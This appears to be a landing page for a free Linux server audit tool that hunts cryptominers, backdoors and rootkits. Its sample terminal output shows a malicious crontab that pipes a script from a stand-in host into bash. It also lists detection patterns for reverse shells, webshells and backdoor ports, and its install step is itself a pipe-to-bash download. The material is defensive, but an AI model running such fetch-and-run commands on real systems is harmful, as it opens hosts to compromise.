Browser Browser

Сканирование

Новый скан Мониторы

Инструменты

My IP DNS Lookup WHOIS SSL Certificate Ping HTTP Headers Domain Check IP Calculator IDN Converter Reverse DNS Schema Generator TAS-IX Трассировка

Сервисы

Массовый скан Хостинг Отчёт CSEC Дефейс

Разведка

Армия AI-агентов Конкуренты Граф CVE Страхование Репутация

SEO

AI Blog GitHub SEO Site Audit Site Compare Traffic Analytics

Ещё

Все функции Документация Цены
Начать бесплатно
LYNIS · DDOS DETECTOR · CRYPTOMINER HUNT

Why is your server eating CPU?

One bash one-liner over SSH. We collect top processes, network connections, cron jobs, log tails, recently changed files, run Lynis (200+ hardening checks), look for known cryptominer signatures and DDoS-rate IPs in your access log. Free. Read-only. One bash one-liner.

Get the one-liner Read docs
Free · No agent install · Read-only · Single-use 1h token
root@web-01:~#
# step 1 — generate token in browser.uz dashboard # step 2 — paste this on the server (SSH session): $ curl -sS 'https://browser.uz/api/audit/agent.sh?t=AUDIT_TOKEN' | bash [1/9] Host basics … OK [2/9] CPU & memory snapshot … 🔴 PID 28419 (xmrig) — 98% CPU, running as nobody [3/9] Network connections … 🟠 listening on :4444 (Metasploit default port) [4/9] Cron jobs … 🔴 root crontab: */5 * * * * curl x.example.com/r.sh | bash [5/9] Web access log analysis … 🟠 1.2.3.4 = 4,200 req in last 10k log lines (DDoS-like) [6/9] Lynis hardening audit … 🟠 hardening_index = 58/100 · 14 warnings · 27 suggestions [7/9] Recent file changes … 🟡 /etc/passwd modified 3h ago [8/9] Optional rootkit scan … skipped (not installed) [9/9] Packing report … ✅ Audit uploaded successfully → browser.uz/<token>/server-audit
What we detect in one run
🔴 Cryptominer
Match against 12 known names: xmrig, kdevtmpfsi, kinsing, kthrotlds, perfctl, etc.
🟠 DDoS pattern
Top 25 IPs in nginx/apache log; flag any >1500 req per 10k lines.
🔴 Suspicious cron
curl|bash, base64-decode, /dev/tcp reverse-shell patterns.
🟠 Backdoor port
Listeners on 4444, 6666, 31337, 1337 — common red-team / Metasploit ports.
🟢 Lynis 200+ checks
SSH config, file permissions, malware traces, ISO27001/PCI-DSS controls.
🟡 Modified /etc
Files like /etc/passwd, /etc/sudoers, sshd_config changed in last 7 days.
🟠 Failed services
systemctl --failed — units that crashed silently.
🟠 Disk & load
Mount >95% full, load avg >4× core count. Servers misbehave fast.
🟢 Rootkit (optional)
If rkhunter or chkrootkit are installed — we run them too.
🔴 DNS-tunnel exfil
MITRE T1071.004 — parses BIND/dnsmasq/systemd-resolved logs. 6 signatures (label len, entropy, TXT abuse, unique subdomain count). 2+ hits → high, 3+ → critical.
🟠 SSH brute-force
MITRE T1110.001 — parses /var/log/auth.log + lastb. ≥50 failed attempts from one IP → high, ≥500 → critical.
🔴 Webshell
MITRE T1505.003 — greps /var/www for PHP/JSP/ASP shell patterns: eval(base64_decode), $_POST → system(), Runtime.exec, classic ASP CreateObject.
🟠 Writable +x in /tmp
MITRE T1059 — executable files in /tmp, /var/tmp, /dev/shm — malware payload staging area. Legitimate software almost never drops binaries here.
🔴 LD_PRELOAD rootkit
MITRE T1574.006 — non-empty /etc/ld.so.preload is virtually always a userland rootkit (Jynx2, Azazel, Diamorphine).
🟡 Suspicious kernel module
MITRE T1547.006 — lsmod against distro allowlist. Names matching diamorphine/reptile/kbeast/azazel/suterusu → critical.
🟠 PROMISC interface
MITRE T1040 — physical NIC in promiscuous mode (not bridge/tap/docker) = sniffer running, post-exploit tooling.
🔴 authorized_keys tamper
MITRE T1098.004 — group/world-writable ~/.ssh/authorized_keys = persistent SSH backdoor. Direct-root keys flagged separately.
🔴 Docker socket exposed
MITRE T1611 — /var/run/docker.sock mode 0777 OR bind-mounted inside container = instant container-to-host root.

How it works

01.
Generate token
Click "Generate one-liner" on /server-audit. Server creates a 1-hour, single-use token tied to your account.
02.
SSH and paste
SSH to your server, paste curl -sS '...' | bash. Agent runs locally — read-only. ~30 seconds.
03.
Auto-upload
Diagnostic JSON is uploaded back to browser.uz. Agent then deletes itself + working dir.
04.
Findings appear
Dashboard shows severity-tagged findings with evidence snippets and ready-to-paste fix commands.

vs Datadog / NewRelic / monitoring agents

Aspect Browser Server Audit Datadog / NewRelic
Install daemon?✗ No✓ required
Continuous metrics?✗ One-shot✓ 24/7 stream
Cryptominer detector?✓ 12 signatures✗ no
DDoS log analysis?✓ Top-IP diff— add-on
Suspicious cron detector?✓ regex set✗ no
Lynis hardening audit?✓ 200+ checks✗ no
DNS-tunnel exfil detector?✓ T1071.004, 6 sigs✗ no
Webshell / SSH brute / rootkit / LD_PRELOAD checks?✓ 8 MITRE-mapped engines✗ no (separate EDR)
CostFree$15-23/host/mo
Best forDiscrete security auditContinuous performance

🔒 What we never read

Find what's eating your server right now.

One bash one-liner. Free. Read-only. Results in 30 seconds.

Run my first audit →

Powered by CISOfy/Lynis (GPL-3.0, used as external auditor on your server). Browser does not redistribute Lynis source — the agent script downloads it from upstream GitHub releases at scan time.